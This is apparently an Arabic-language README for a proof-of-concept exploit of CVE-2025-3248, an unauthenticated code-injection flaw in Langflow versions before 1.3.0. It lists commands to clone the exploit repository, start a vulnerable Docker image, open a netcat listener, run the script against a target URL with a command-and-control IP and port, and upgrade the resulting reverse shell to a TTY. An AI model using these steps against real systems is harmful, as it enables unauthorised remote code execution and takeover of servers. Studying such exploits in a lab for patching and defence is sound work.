
PoC لتحقيق RCE في إصدارات Langflow <1.3.0
إصدارات Langflow قبل 1.3.0 معرضة لحقن كود بدون مصادقة في نقطة النهاية /api/v1/validate/code عبر دالة exec() في بايثون. يقيم هذا الاستغلال اتصال صدفة عكسية مستغلًا هذه الثغرة.
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4
# Terminal 1
nc -nvlp <C2_PORT>
# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>
مثال: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337
ملاحظة: لترقية الصدفة إلى TTY، نفّذ الأمر التالي بعد الحصول على الصدفة.
python -c 'import pty; pty.spawn("/bin/bash")'
